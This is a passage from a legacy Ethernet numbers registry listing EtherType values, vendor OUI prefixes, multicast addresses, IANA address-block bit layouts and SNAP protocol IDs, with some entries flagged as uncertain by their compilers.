21000 5208 - - BBN Simnet [XEROX]
24576 6000 - - DEC Unassigned (Exp.) [XEROX]
24577 6001 - - DEC MOP Dump/Load [XEROX]
24578 6002 - - DEC MOP Remote Console [XEROX]
24579 6003 - - DEC DECNET Phase IV Route[XEROX]
24580 6004 - - DEC LAT [XEROX]
24581 6005 - - DEC Diagnostic Protocol [XEROX]
24582 6006 - - DEC Customer Protocol [XEROX]
24583 6007 - - DEC LAVC, SCA [XEROX]
24584 6008-6009 - - DEC Unassigned [XEROX]
24586 6010-6014 - - 3Com Corporation [XEROX]
25944 6558 - - Trans Ether Bridging [RFC1701]
25945 6559 - - Raw Frame Relay [RFC1701]
28672 7000 - - Ungermann-Bass download [XEROX]
28674 7002 - - Ungermann-Bass dia/loop [XEROX]
28704 7020-7029 - - LRT [XEROX]
28720 7030 - - Proteon [XEROX]
28724 7034 - - Cabletron [XEROX]
32771 8003 - - Cronus VLN [131,DT15]
32772 8004 - - Cronus Direct [131,DT15]
32773 8005 - - HP Probe [XEROX]
32774 8006 - - Nestar [XEROX]
32776 8008 - - AT&T [XEROX]
32784 8010 - - Excelan [XEROX]
32787 8013 - - SGI diagnostics [AXC]
32788 8014 - - SGI network games [AXC]
32789 8015 - - SGI reserved [AXC]
32790 8016 - - SGI bounce server [AXC]
32793 8019 - - Apollo Domain [XEROX]
32815 802E - - Tymshare [XEROX]
32816 802F - - Tigan, Inc. [XEROX]
32821 8035 - - Reverse ARP [48,JXM]
32822 8036 - - Aeonic Systems [XEROX]
32824 8038 - - DEC LANBridge [XEROX]
32825 8039-803C - - DEC Unassigned [XEROX]
32829 803D - - DEC Ethernet Encryption [XEROX]
32830 803E - - DEC Unassigned [XEROX]
32831 803F - - DEC LAN Traffic Monitor [XEROX]
32832 8040-8042 - - DEC Unassigned [XEROX]
32836 8044 - - Planning Research Corp. [XEROX]
32838 8046 - - AT&T [XEROX]
32839 8047 - - AT&T [XEROX]
32841 8049 - - ExperData [XEROX]
32859 805B - - Stanford V Kernel exp. [XEROX]
32860 805C - - Stanford V Kernel prod. [XEROX]
32861 805D - - Evans & Sutherland [XEROX]
32864 8060 - - Little Machines [XEROX]
32866 8062 - - Counterpoint Computers [XEROX]
32869 8065 - - Univ. of Mass. @ Amherst [XEROX]
32870 8066 - - Univ. of Mass. @ Amherst [XEROX]
32871 8067 - - Veeco Integrated Auto. [XEROX]
32872 8068 - - General Dynamics [XEROX]
32873 8069 - - AT&T [XEROX]
32874 806A - - Autophon [XEROX]
32876 806C - - ComDesign [XEROX]
32877 806D - - Computgraphic Corp. [XEROX]
32878 806E-8077 - - Landmark Graphics Corp. [XEROX]
32890 807A - - Matra [XEROX]
32891 807B - - Dansk Data Elektronik [XEROX]
32892 807C - - Merit Internodal [HWB]
32893 807D-807F - - Vitalink Communications [XEROX]
32896 8080 - - Vitalink TransLAN III [XEROX]
32897 8081-8083 - - Counterpoint Computers [XEROX]
32923 809B - - Appletalk [XEROX]
32924 809C-809E - - Datability [XEROX]
32927 809F - - Spider Systems Ltd. [XEROX]
32931 80A3 - - Nixdorf Computers [XEROX]
32932 80A4-80B3 - - Siemens Gammasonics Inc. [XEROX]
32960 80C0-80C3 - - DCA Data Exchange Cluster[XEROX]
32964 80C4 - - Banyan Systems [XEROX]
32965 80C5 - - Banyan Systems [XEROX]
32966 80C6 - - Pacer Software [XEROX]
32967 80C7 - - Applitek Corporation [XEROX]
32968 80C8-80CC - - Intergraph Corporation [XEROX]
32973 80CD-80CE - - Harris Corporation [XEROX]
32975 80CF-80D2 - - Taylor Instrument [XEROX]
32979 80D3-80D4 - - Rosemount Corporation [XEROX]
32981 80D5 - - IBM SNA Service on Ether [XEROX]
32989 80DD - - Varian Associates [XEROX]
32990 80DE-80DF - - Integrated Solutions TRFS[XEROX]
32992 80E0-80E3 - - Allen-Bradley [XEROX]
32996 80E4-80F0 - - Datability [XEROX]
33010 80F2 - - Retix [XEROX]
33011 80F3 - - AppleTalk AARP (Kinetics)[XEROX]
33012 80F4-80F5 - - Kinetics [XEROX]
33015 80F7 - - Apollo Computer [XEROX]
33023 80FF-8103 - - Wellfleet Communications [XEROX]
33031 8107-8109 - - Symbolics Private [XEROX]
33072 8130 - - Hayes Microcomputers [XEROX]
33073 8131 - - VG Laboratory Systems [XEROX]
33074 8132-8136 Bridge Communications [XEROX]
33079 8137-8138 - - Novell, Inc. [XEROX]
33081 8139-813D - - KTI [XEROX]
8148 Logicraft [XEROX]
8149 Network Computing Devices[XEROX]
814A Alpha Micro [XEROX]
33100 814C - - SNMP [JKR1]
814D BIIN [XEROX]
814E BIIN [XEROX]
814F Technically Elite Concept[XEROX]
8150 Rational Corp [XEROX]
8151-8153 Qualcomm [XEROX]
815C-815E Computer Protocol Pty Ltd[XEROX]
8164-8166 Charles River Data System[XEROX]
817D XTP [XEROX]
817E SGI/Time Warner prop. [XEROX]
8180 HIPPI-FP encapsulation [XEROX]
8181 STP, HIPPI-ST [XEROX]
8182 Reserved for HIPPI-6400 [XEROX]
8183 Reserved for HIPPI-6400 [XEROX]
8184-818C Silicon Graphics prop. [XEROX]
818D Motorola Computer [XEROX]
819A-81A3 Qualcomm [XEROX]
81A4 ARAI Bunkichi [XEROX]
81A5-81AE RAD Network Devices [XEROX]
81B7-81B9 Xyplex [XEROX]
81CC-81D5 Apricot Computers [XEROX]
81D6-81DD Artisoft [XEROX]
81E6-81EF Polygon [XEROX]
81F0-81F2 Comsat Labs [XEROX]
81F3-81F5 SAIC [XEROX]
81F6-81F8 VG Analytical [XEROX]
8203-8205 Quantum Software [XEROX]
8221-8222 Ascom Banking Systems [XEROX]
823E-8240 Advanced Encryption Syste[XEROX]
827F-8282 Athena Programming [XEROX]
8263-826A Charles River Data System[XEROX]
829A-829B Inst Ind Info Tech [XEROX]
829C-82AB Taurus Controls [XEROX]
82AC-8693 Walker Richer & Quinn [XEROX]
8694-869D Idea Courier [XEROX]
869E-86A1 Computer Network Tech [XEROX]
86A3-86AC Gateway Communications [XEROX]
86DB SECTRA [XEROX]
86DE Delta Controls [XEROX]
86DD IPv6 [IANA]
34543 86DF - - ATOMIC [Postel]
86E0-86EF Landis & Gyr Powers [XEROX]
8700-8710 Motorola [XEROX]
34667 876B - - TCP/IP Compression [RFC1144]
34668 876C - - IP Autonomous Systems [RFC1701]
34669 876D - - Secure Data [RFC1701]
880B PPP [IANA]
8847 MPLS Unicast [Rosen]
8848 MPLS Multicast [Rosen]
8A96-8A97 Invisible Software [XEROX]
36864 9000 - - Loopback [XEROX]
36865 9001 - - 3Com(Bridge) XNS Sys Mgmt[XEROX]
36866 9002 - - 3Com(Bridge) TCP-IP Sys [XEROX]
36867 9003 - - 3Com(Bridge) loop detect [XEROX]
65280 FF00 - - BBN VITAL-LanBridge cache[XEROX]
FF00-FF0F ISC Bunker Ramo [XEROX]
65535 FFFF - - Reserved [RFC1701]
The standard for transmission of IP datagrams over Ethernets and
Experimental Ethernets is specified in [RFC894] and [RFC895]
respectively.
NOTE: Ethernet 48-bit address blocks are assigned by the IEEE.
IEEE Registration Authority
c/o Iris Ringel
IEEE Standards Department
445 Hoes Lane, P.O. Box 1331
Piscataway, NJ 08855-1331
Phone +1 732 562 3813
Fax: +1 732 562 1571
Email:
ETHERNET VENDOR ADDRESS COMPONENTS or ORGANIZATIONALLY UNIQUE IDENTIFIERS
Ethernet hardware addresses are 48 bits, expressed as 12 hexadecimal
digits (0-9, plus A-F, capitalized). These 12 hex digits consist of
the first/left 6 digits (which should match the vendor of the Ethernet
interface within the station) and the last/right 6 digits which
specify the interface serial number for that interface vendor.
These high-order 3 octets (6 hex digits) are also known as the
Organizationally Unique Identifier or OUI.
Ethernet addresses might be written unhyphenated (e.g., 123456789ABC),
or with one hyphen (e.g., 123456-789ABC), but should be written
hyphenated by octets (e.g., 12-34-56-78-9A-BC).
These addresses are physical station addresses, not multicast nor
broadcast, so the second hex digit (reading from the left) will be
even, not odd.
At present, it is not clear how the IEEE assigns Ethernet block
addresses. Whether in blocks of 2**24 or 2**25, and whether
multicasts are assigned with that block or separately. A portion of
the vendor block address is reportedly assigned serially, with the
other portion intentionally assigned randomly. If there is a global
algorithm for which addresses are designated to be physical (in a
chipset) versus logical (assigned in software), or globally-assigned
versus locally-assigned addresses, some of the known addresses do not
follow the scheme (e.g., AA0003; 02xxxx).
Another list of Ethernet vendor address components is maitained by
Michael A. Patton and is accessible at:
00000C Cisco
00000E Fujitsu
00000F NeXT
000010 Sytek
00001D Cabletron
000020 DIAB (Data Intdustrier AB)
000022 Visual Technology
00002A TRW
000032 GPT Limited (reassigned from GEC Computers Ltd)
00005A S & Koch
00005E IANA
000065 Network General
00006B MIPS
000077 Interphase Corporation
00007A Ardent
000080 Cray Communications A/S
000089 Cayman Systems Gatorbox
000093 Proteon
00009F Ameristar Technology
0000A2 Wellfleet
0000A3 Network Application Technology
0000A6 Network General (internal assignment, not for products)
0000A7 NCD X-terminals
0000A9 Network Systems
0000AA Xerox Xerox machines
0000B3 CIMLinc
0000B7 Dove Fastnet
0000BC Allen-Bradley
0000C0 Western Digital
0000C5 Farallon phone net card
0000C6 HP Intelligent Networks Operation (formerly Eon Systems)
0000C8 Altos
0000C9 Emulex Terminal Servers
0000D0 Develcon
0000D7 Dartmouth College (NED Router)
0000D8 3Com? Novell? PS/2
0000DD Gould
0000DE Unigraph
0000E2 Acer Counterpoint
0000EF Alantec
0000FD High Level Hardvare (Orion, UK)
000102 BBN BBN internal usage (not registered)
0010D1 BlazeNet
001700 Kabel
0020AF 3COM ???
0020C9 Victron
002094 Cubix
008064 Wyse Technology / Link Technologies
00802B IMAC ???
00802D Xylogics, Inc. Annex terminal servers
00808C Frontier Software Development
0080C2 IEEE 802.1 Committee
0080D3 Shiva
00A03E ATM Forum
00AA00 Intel
00DD00 Ungermann-Bass
00DD01 Ungermann-Bass
020701 Racal InterLan
020406 BBN BBN internal usage (not registered)
026086 Satelcom MegaPac (UK)
02608C 3Com IBM PC; Imagen; Valid; Cisco
02CF1F CMC Masscomp; Silicon Graphics; Prime EXL
080002 3Com (Formerly Bridge)
080003 ACC (Advanced Computer Communications)
080005 Symbolics Symbolics LISP machines
080008 BBN
080009 Hewlett-Packard
08000A Nestar Systems
08000B Unisys
080011 Tektronix, Inc.
080014 Excelan BBN Butterfly, Masscomp, Silicon Graphics
080017 NSC
08001A Data General
08001B Data General
08001E Apollo
080020 Sun Sun machines
080022 NBI
080025 CDC
080026 Norsk Data (Nord)
080027 PCS Computer Systems GmbH
080028 TI Explorer
08002B DEC
08002E Metaphor
08002F Prime Computer Prime 50-Series LHC300
080036 Intergraph CAE stations
080037 Fuji-Xerox
080038 Bull
080039 Spider Systems
080041 DCA Digital Comm. Assoc.
080045 ???? (maybe Xylogics, but they claim not to know this number)
080046 Sony
080047 Sequent
080049 Univation
08004C Encore
08004E BICC
080056 Stanford University
080058 ??? DECsystem-20
08005A IBM
080067 Comdesign
080068 Ridge
080069 Silicon Graphics
08006E Concurrent Masscomp
080075 DDE (Danish Data Elektronik A/S)
08007C Vitalink TransLAN III
080080 XIOS
080086 Imagen/QMS
080087 Xyplex terminal servers
080089 Kinetics AppleTalk-Ethernet interface
08008B Pyramid
08008D XyVision XyVision machines
080090 Retix Inc Bridges
484453 HDS ???
800010 AT&T
AA0000 DEC obsolete
AA0001 DEC obsolete
AA0002 DEC obsolete
AA0003 DEC Global physical address for some DEC machines
AA0004 DEC Local logical address for systems running
DECNET
The CFxxxx Series
RFC 2153 describes a method of usings a "pseudo OUI" for certain
purposes when there is no appropriate regular OUI assigned. These are
listed here.
CF0001 Data Comm for Business [McCain]
ETHERNET MULTICAST ADDRESSES
An Ethernet multicast address consists of the multicast bit, the
23-bit vendor component, and the 24-bit group identifier assigned by
the vendor. For example, DEC is assigned the vendor component
08-00-2B, so multicast addresses assigned by DEC have the first
24-bits 09-00-2B (since the multicast bit is the low-order bit of the
first byte, which is "the first bit on the wire").
Another list of Ethernet multicast addresses is maitained by Michael
A. Patton and is accessible at:
Ethernet Type
Address Field Usage
Multicast Addresses:
01-00-5E-00-00-00- 0800 Internet Multicast [RFC1112]
01-00-5E-7F-FF-FF
01-00-5E-80-00-00- ???? Internet reserved by IANA
01-00-5E-FF-FF-FF
01-80-C2-00-00-00 -802- Spanning tree (for bridges)
09-00-02-04-00-01? 8080? Vitalink printer
09-00-02-04-00-02? 8080? Vitalink management
09-00-09-00-00-01 8005 HP Probe
09-00-09-00-00-01 -802- HP Probe
09-00-09-00-00-04 8005? HP DTC
09-00-1E-00-00-00 8019? Apollo DOMAIN
09-00-2B-00-00-00 6009? DEC MUMPS?
09-00-2B-00-00-01 8039? DEC DSM/DTP?
09-00-2B-00-00-02 803B? DEC VAXELN?
09-00-2B-00-00-03 8038 DEC Lanbridge Traffic Monitor (LTM)
09-00-2B-00-00-04 ???? DEC MAP End System Hello
09-00-2B-00-00-05 ???? DEC MAP Intermediate System Hello
09-00-2B-00-00-06 803D? DEC CSMA/CD Encryption?
09-00-2B-00-00-07 8040? DEC NetBios Emulator?
09-00-2B-00-00-0F 6004 DEC Local Area Transport (LAT)
09-00-2B-00-00-1x ???? DEC Experimental
09-00-2B-01-00-00 8038 DEC LanBridge Copy packets
(All bridges)
09-00-2B-01-00-01 8038 DEC LanBridge Hello packets
(All local bridges)
1 packet per second, sent by the
designated LanBridge
09-00-2B-02-00-00 ???? DEC DNA Lev. 2 Routing Layer routers?
09-00-2B-02-01-00 803C? DEC DNA Naming Service Advertisement?
09-00-2B-02-01-01 803C? DEC DNA Naming Service Solicitation?
09-00-2B-02-01-02 803E? DEC DNA Time Service?
09-00-2B-03-xx-xx ???? DEC default filtering by bridges?
09-00-2B-04-00-00 8041? DEC Local Area Sys. Transport (LAST)?
09-00-2B-23-00-00 803A? DEC Argonaut Console?
09-00-4E-00-00-02? 8137? Novell IPX
09-00-56-00-00-00- ???? Stanford reserved
09-00-56-FE-FF-FF
09-00-56-FF-00-00- 805C Stanford V Kernel, version 6.0
09-00-56-FF-FF-FF
09-00-77-00-00-01 ???? Retix spanning tree bridges
09-00-7C-02-00-05 8080? Vitalink diagnostics
09-00-7C-05-00-01 8080? Vitalink gateway?
0D-1E-15-BA-DD-06 ???? HP
AB-00-00-01-00-00 6001 DEC Maintenance Operation Protocol
(MOP) Dump/Load Assistance
AB-00-00-02-00-00 6002 DEC Maintenance Operation Protocol
(MOP) Remote Console
1 System ID packet every 8-10 minutes,
by every:
DEC LanBridge
DEC DEUNA interface
DEC DELUA interface
DEC DEQNA interface
(in a certain mode)
AB-00-00-03-00-00 6003 DECNET Phase IV end node Hello
packets 1 packet every 15 seconds,
sent by each DECNET host
AB-00-00-04-00-00 6003 DECNET Phase IV Router Hello packets
1 packet every 15 seconds, sent by
the DECNET router
AB-00-00-05-00-00 ???? Reserved DEC through
AB-00-03-FF-FF-FF
AB-00-03-00-00-00 6004 DEC Local Area Transport (LAT) - old
AB-00-04-00-xx-xx ???? Reserved DEC customer private use
AB-00-04-01-xx-yy 6007 DEC Local Area VAX Cluster groups
Sys. Communication Architecture (SCA)
CF-00-00-00-00-00 9000 Ethernet Configuration Test protocol
(Loopback)
Broadcast Address:
FF-FF-FF-FF-FF-FF 0600 XNS packets, Hello or gateway search?
6 packets every 15 seconds, per XNS
station
FF-FF-FF-FF-FF-FF 0800 IP (e.g. RWHOD via UDP) as needed
FF-FF-FF-FF-FF-FF 0804 CHAOS
FF-FF-FF-FF-FF-FF 0806 ARP (for IP and CHAOS) as needed
FF-FF-FF-FF-FF-FF 0BAD Banyan
FF-FF-FF-FF-FF-FF 1600 VALID packets, Hello or gateway
search?
1 packets every 30 seconds, per VALID
station
FF-FF-FF-FF-FF-FF 8035 Reverse ARP
FF-FF-FF-FF-FF-FF 807C Merit Internodal (INP)
FF-FF-FF-FF-FF-FF 809B EtherTalk
IANA ETHERNET ADDRESS BLOCK - UNICAST USE
The IANA owns an Ethernet address block which may be used for
unicast address asignments or other special purposes.
The IANA may assign unicast global IEEE 802 MAC address from it's
assigned OUI (00-00-5E) for use in IETF standard track protocols. The
intended usage is for dynamic mapping between IP addresses and IEEE
802 MAC addresses. These IEEE 802 MAC addresses are not to be
permanently assigned to any hardware interface, nor is this a
substitute for a network equipment supplier getting its own OUI.
The address block in IEEE binary is: 0000 0000 0000 0000 0111 1010
In the normal Internet dotted decimal notation this is 0.0.94 since
the bytes are transmitted higher order first and bits within bytes are
transmitted lower order first.
IEEE CSMA/CD and Token Bus bit transmission order: 00 00 5E
IEEE Token Ring bit transmission order: 00 00 7A
Appearance on the wire (bits transmitted from left to right):
0 23 47
| | |
0000 0000 0000 0000 0111 1010 xxxx xxxx xxxx xxxx xxxx xxxx
|
Multicast Bit
Appearance in memory (bits transmitted right-to-left within octets,
octets transmitted left-to-right):
0 23 47
| | |
0000 0000 0000 0000 0101 1110 xxxx xxxx xxxx xxxx xxxx xxxx
|
Multicast Bit
The latter representation corresponds to the Internet standard
bit-order, and is the format that most programmers have to deal with.
Using this representation, the range of Internet Unicast addresses is:
00-00-5E-00-00-00 to 00-00-5E-FF-FF-FF in hex, or
0.0.94.0.0.0 to 0.0.94.255.255.255 in dotted decimal
The low order 24 bits of these unicast addresses are assigned as
follows:
Dotted Decimal Description Reference
----------------------- ------------------------------- ---------
000.000.000-000.000.255 Reserved [IANA]
000.001.000-000.001.255 Virual Router Redundancy (VRRP) [Hinden]
IANA ETHERNET ADDRESS BLOCK - MULTICAST USE
The IANA owns an Ethernet address block which may be used for
multicast address asignments or other special purposes.
The address block in IEEE binary is: 0000 0000 0000 0000 0111 1010
In the normal Internet dotted decimal notation this is 0.0.94 since
the bytes are transmitted higher order first and bits within bytes are
transmitted lower order first.
IEEE CSMA/CD and Token Bus bit transmission order: 00 00 5E
IEEE Token Ring bit transmission order: 00 00 7A
Appearance on the wire (bits transmitted from left to right):
0 23 47
| | |
1000 0000 0000 0000 0111 1010 xxxx xxx0 xxxx xxxx xxxx xxxx
| |
Multicast Bit 0 = Internet Multicast
1 = Assigned by IANA for
other uses
Appearance in memory (bits transmitted right-to-left within octets,
octets transmitted left-to-right):
0 23 47
| | |
0000 0001 0000 0000 0101 1110 0xxx xxxx xxxx xxxx xxxx xxxx
| |
Multicast Bit 0 = Internet Multicast
1 = Assigned by IANA for other uses
The latter representation corresponds to the Internet standard
bit-order, and is the format that most programmers have to deal with.
Using this representation, the range of Internet Multicast addresses
is:
01-00-5E-00-00-00 to 01-00-5E-7F-FF-FF in hex, or
1.0.94.0.0.0 to 1.0.94.127.255.255 in dotted decimal
SNAP PROTOCOL IDS IN THE IANA ETHERNET ADDRESS BLOCK
The Sub-Network Access Protocol (SNAP) header contains 40 bits: 24
bits containing an IEEE-assigned Organizationally Unique Identifier
(OUI), and 16 bits containing a Protocol Identifier (PID). The OUIs
are the same as those used in the Ethernet Vendor Address Components
list above. The IANA's OUI, 00-00-5E, may be used in SNAP headers
with the appropriate PID to identify the protocols listed below.
Note that the IANA restricts this list to protocols that are ONLY
identified in this manner; if a protocol has an EtherType, then SNAP
headers identifying that protocol must contain an OUI of 00-00-00,
with the EtherType in the PID field.
The SNAP PID assignments using the IANA's OUI are:
Protocol ID Description References
----------- ----------- ----------
decimal Hex
0001 0001 MARS Data Messages (short form) [RFC2022]
0002 0002 reserved for future NHRP use [RFC2332]
0003 0003 MARS/NHRP Control Messages [RFC2022, 2332]
0004 0004 MARS Data Messages (long form) [RFC2022]
0005 0005 SCSP - Server Cache Sync Protocol [RFC2334]
0006 0006 VRID - Virtual Router MAC Address [Knight]
0007 0007 L2TP [RFC3070]
0008 0008 Virtual Private Network ID [Malis-ID]
0009 0009 MSDP-GRE-Protocol Type [msdp-ID]
Vendor Codes For EtherNet Interfaces :-
000001 SuperLAN-2U
000002 BBN (was internal usage only, no longer used)
000009 powerpipes?
00000C Cisco
00000E Fujitsu
00000F NeXT
000010 Hughes LAN Systems (formerly Sytek)
000011 Tektronix
000015 Datapoint Corporation
000018 Webster Computer Corporation Appletalk/Ethernet Gateway
00001A AMD (?)
00001B Novell (now Eagle Technology)
00001C JDR Microdevices generic, NE2000 drivers
00001D Cabletron
00001F Cryptall Communications Corp.
000020 DIAB (Data Intdustrier AB)
000021 SC&C (PAM Soft&Hardware also reported)
000022 Visual Technology
000023 ABB Automation AB, Dept. Q
000024 Olicom
000029 IMC
00002A TRW
00002C NRC - Network Resources Corporation - MultiGate Hub1+, Hub2, etc
000032 GPT Limited (reassigned from GEC Computers Ltd)
000037 Oxford Metrics Ltd
00003B Hyundai/Axil Sun clones
00003C Auspex
00003D AT&T
00003F Syntrex Inc
000044 Castelle
000046 ISC-Bunker Ramo, An Olivetti Company
000048 Epson
000049 Apricot Ltd.
00004B APT -ICL also reported
00004C NEC Corporation
00004F Logicraft 386-Ware P.C. Emulator
000051 Hob Electronic Gmbh & Co. KG
000052 Optical Data Systems
000055 AT&T
000058 Racore Computer Products Inc
00005A SK (Schneider & Koch in Europe and Syskonnect outside of Europe)
00005A Xerox 806 (unregistered)
00005B Eltec
00005D RCE
00005E U.S. Department of Defense (IANA)
00005F Sumitomo
000061 Gateway Communications
000062 Honeywell
000063 Hewlett-Packard LanProbe
000064 Yokogawa Digital Computer Corp
000065 Network General
000066 Talaris
000068 Rosemount Controls
000069 Concord Communications, Inc (although someone said Silicon Graphics)
00006B MIPS
00006D Case
00006E Artisoft, Inc.
00006F Madge Networks Ltd. Token-ring adapters
000073 DuPont
000075 Bell Northern Research (BNR)
000077 Interphase [Used in other systems, e.g. MIPS, Motorola]
000078 Labtam Australia
000079 Networth Incorporated [bought by Compaq, used in Netelligent series]
00007A Ardent
00007B Research Machines
00007D Cray Research Superservers,Inc [Also Harris (3M) (old)]
00007E NetFRAME multiprocessor network servers
00007F Linotype-Hell AG Linotronic typesetters
000080 Cray Communications (formerly Dowty Network Services) [Also shows as "Harris (3M) (new)" and/or "Imagen(?)" elsewhere]
000081 Synoptics
000083 Tadpole Technology [had Optical Data Systems which is wrong according to both]
000084 Aquila (?), ADI Systems Inc.(?)
000086 Gateway Communications Inc. (then Megahertz & now 3com)
000087 Hitachi
000089 Cayman Systems Gatorbox
00008A Datahouse Information Systems
00008E Solbourne(?), Jupiter(?) (I've had confirming mail on Solbourne)
000092 Unisys, Cogent (both reported)
000093 Proteon
000094 Asante MAC
000095 Sony/Tektronix
000097 Epoch
000098 Cross Com
000099 Memorex Telex Corporations
00009F Ameristar Technology
0000A0 Sanyo Electronics
0000A2 Wellfleet
0000A3 Network Application Technology (NAT)
0000A4 Acorn
0000A5 Compatible Systems Corporation
0000A6 Network General (internal assignment, not for products)
0000A7 Network Computing Devices (NCD) X-terminals
0000A8 Stratus Computer, Inc.
0000A9 Network Systems
0000AA Xerox Xerox machines
0000AC Conware Netzpartner [had Apollo, claimed incorrect]
0000AE Dassault Automatismes et Telecommunications
0000AF Nuclear Data Acquisition Interface Modules (AIM)
0000B0 RND (RAD Network Devices)
0000B1 Alpha Microsystems Inc.
0000B3 CIMLinc
0000B4 Edimax
0000B5 Datability Terminal Servers
0000B6 Micro-matic Research
0000B7 Dove Fastnet
0000BB TRI-DATA Systems Inc. Netway products, 3274 emulators
0000BC Allen-Bradley
0000C0 Western Digital now SMC (Std. Microsystems Corp.)
0000C1 Olicom A/S
0000C5 Farallon Computing Inc
0000C6 HP Intelligent Networks Operation (formerly Eon Systems)
0000C8 Altos
0000C9 Emulex Terminal Servers, Print Servers
0000CA LANcity Cable Modems (now owned by BayNetworks)
0000CC Densan Co., Ltd.
0000CD Industrial Research Limited
0000D0 Develcon Electronics, Ltd.
0000D1 Adaptec, Inc. "Nodem" product
0000D2 SBE Inc
0000D3 Wang Labs
0000D4 PureData
0000D7 Dartmouth College (NED Router)
0000D8 old Novell NE1000's (before about 1987?) (also 3Com)
0000DD Gould
0000DE Unigraph
0000E1 Hitachi (laptop built-in)
0000E2 Acer Counterpoint
0000E3 Integrated Micro Products Ltd
0000E4 mips?
0000E6 Aptor Produits De Comm Indust
0000E8 Accton Technology Corporation
0000E9 ISICAD, Inc.
0000ED April
0000EE Network Designers Limited [also KNX Ltd, a former division]
0000EF Alantec (now owned by ForeSystems)
0000F0 Samsung
0000F2 Spider Communications (Montreal, not Spider Systems)
0000F3 Gandalf Data Ltd. - Canada
0000F4 Allied Telesis, Inc.
0000F6 A.M.C. (Applied Microsystems Corp.)
0000F8 DEC
0000FB Rechner zur Kommunikation
0000FD High Level Hardware (Orion, UK)
0000FF Camtec Electronics (UK) Ltd.
000102 BBN (Bolt Beranek and Newman, Inc.) internal usage (not registered)
000143 IEEE 802
000150 Megahertz (now 3com) modem
000163 NDC (National Datacomm Corporation)
000168 W&G (Wandel & Goltermann) [incorrect according to W&G]
0001C8 Thomas Conrad Corp.
0001FA Compaq (PageMarq printers)
000204 Novell NE3200
000205 Hamilton (Sparc Clones)
000216 ESI (Extended Systems, Inc) print servers
000288 Global Village (PCcard in Mac portable)
0003C6 Morning Star Technologies Inc
000400 Lexmark (Print Server)
0004AC IBM PCMCIA Ethernet adapter.
000502 Apple (PCI bus Macs)
00059A PowerComputing (Mac clone)
0005A8 PowerComputing Mac clones
00060D Hewlett-Packard JetDirect token-ring interfaces
000629 IBM RISC6000 system
00067C Cisco
0006C1 Cisco
000701 Racal-Datacom
00070D Cisco 2511 Token Ring
000852 Technically Elite Concepts
000855 Fermilab
0008C7 Compaq
001007 Cisco Systems Catalyst 1900
00100B Cisco Systems
00100D Cisco Systems Catalyst 2924-XL
001011 Cisco Systems Cisco 75xx
00101F Cisco Systems Catalyst 2901
001029 Cisco Systems Catalyst 5000
00102F Cisco Systems Cisco 5000
00104B 3Com 3C905-TX PCI
00105A 3Com Fast Etherlink XL in a Gateway 2000
001060 Billington Novell NE200 Compatible
001079 Cisco 5500 Router
00107A Ambicom (was Tandy?)
00107B Cisco Systems
001083 HP-UX E 9000/889
0010A4 Xircom RealPort 10/100 PC Card
0010A6 Cisco
0010D7 Argosy EN 220 Fast Ethernet PCMCIA
0010F6 Cisco
001700 Kabel
002000 Lexmark (Print Server)
002005 simpletech
002008 Cable & Computer Technology
00200C Adastra Systems Corp
002011 Canopus Co Ltd
002017 Orbotech
002018 Realtek
00201A Nbase
002025 Control Technology Inc (Industrial Controls and Network Interfaces)
002028 Bloomberg
002029 TeleProcessing CSU/DSU (now owned by ADC/Kentrox)
00202B ATML (Advanced Telecommunications Modules, Ltd.)
002035 IBM (International Business Machines) mainframes, Etherjet printers
002036 BMC Software
002042 Datametrics Corp
002045 SolCom Systems Limited
002048 Fore Systems Inc
00204B Autocomputer Co Ltd
00204C Mitron Computer Pte Ltd
002056 Neoproducts
002061 Dynatech Communications Inc
002063 Wipro Infotech Ltd
002066 General Magic Inc
002067 Node Runner Inc
00206B Minolta Co., Ltd Network printers
002078 Runtop Inc
002085 3COM SuperStack II UPS management module
00208A Sonix Communications Ltd
00208B Focus Enhancements
00208C Galaxy Networks Inc
002094 Cubix Corporation
0020A5 Newer Technology
0020A6 Proxim Inc
0020A7 Pairgain Technologies, Inc.
0020AF 3COM Corporation
0020B2 CSP (Printline Multiconnectivity converter)
0020B6 Agile Networks Inc
0020B9 Metricom, Inc.
0020C5 Eagle NE2000
0020C6 NECTEC
0020D0 Versalynx Corp. "The One Port" terminal server
0020D2 RAD Data Communications Ltd
0020D3 OST (Ouet Standard Telematique)
0020D8 NetWave
0020DA Xylan
0020DC Densitron Taiwan Ltd
0020E0 PreMax PE-200 (PCMCIA NE2000-clone card, sold by InfoExpress)
0020E5 Apex Data
0020EE Gtech Corporation
0020F6 Net Tek & Karlnet Inc
0020F8 Carrera Computers Inc
0020FC Matrox
004001 Zero One Technology Co Ltd (ZyXEL?)
004005 TRENDware International Inc.; Linksys; Simple Net; all three reported
004009 Tachibana Tectron Co Ltd
00400B Crescendo (now owned by Cisco)
00400C General Micro Systems, Inc.
00400D LANNET Data Communications
004010 Sonic Mac Ethernet interfaces
004011 Facilities Andover Environmental Controllers
004013 NTT Data Communication Systems Corp
004014 Comsoft Gmbh
004015 Ascom
004017 XCd XJet - HP printer server card
00401C AST Pentium/90 PC (emulating AMD EISA card)
00401F Colorgraph Ltd
004020 Pilkington Communication
004023 Logic Corporation
004025 Molecular Dynamics
004026 Melco Inc
004027 SMC Massachusetts [Had:Sigma (?), maybe the "S"?]
004028 Netcomm
00402A Canoga-Perkins
00402B TriGem
00402F Xlnt Designs Inc (XDI)
004030 GK Computer
004032 Digital Communications
004033 Addtron Technology Co., Ltd.
004036 TribeStar
004039 Optec Daiichi Denko Co Ltd
00403C Forks, Inc.
004041 Fujikura Ltd.
004043 Nokia Data Communications
004048 SMD Informatica S.A.
00404C Hypertec Pty Ltd.
00404D Telecomm Techniques
00404F Space & Naval Warfare Systems
004050 Ironics, Incorporated
004052 Star Technologies Inc
004053 Datum [Bancomm Division] TymServe 2000
004054 Thinking Machines Corporation
004057 Lockheed-Sanders
004059 Yoshida Kogyo K.K.
00405B Funasset Limited
00405D Star-Tek Inc
004066 Hitachi Cable, Ltd.
004067 Omnibyte Corporation
004068 Extended Systems
004069 Lemcom Systems Inc
00406A Kentek Information Systems Inc
00406E Corollary, Inc.
00406F Sync Research Inc
004072 Applied Innovation
004074 Cable and Wireless
004076 AMP Incorporated
004078 Wearnes Automation Pte Ltd
00407F Agema Infrared Systems AB
004082 Laboratory Equipment Corp
004085 SAAB Instruments AB
004086 Michels & Kleberhoff Computer
004087 Ubitrex Corporation
004088 Mobuis NuBus (Mac) combination video/EtherTalk
00408A TPS Teleprocessing Sys. Gmbh
00408C Axis Communications AB
00408E CXR/Digilog
00408F WM-Data Minfo AB
004090 Ansel Communications PC NE2000 compatible twisted-pair ethernet cards
004091 Procomp Industria Eletronica
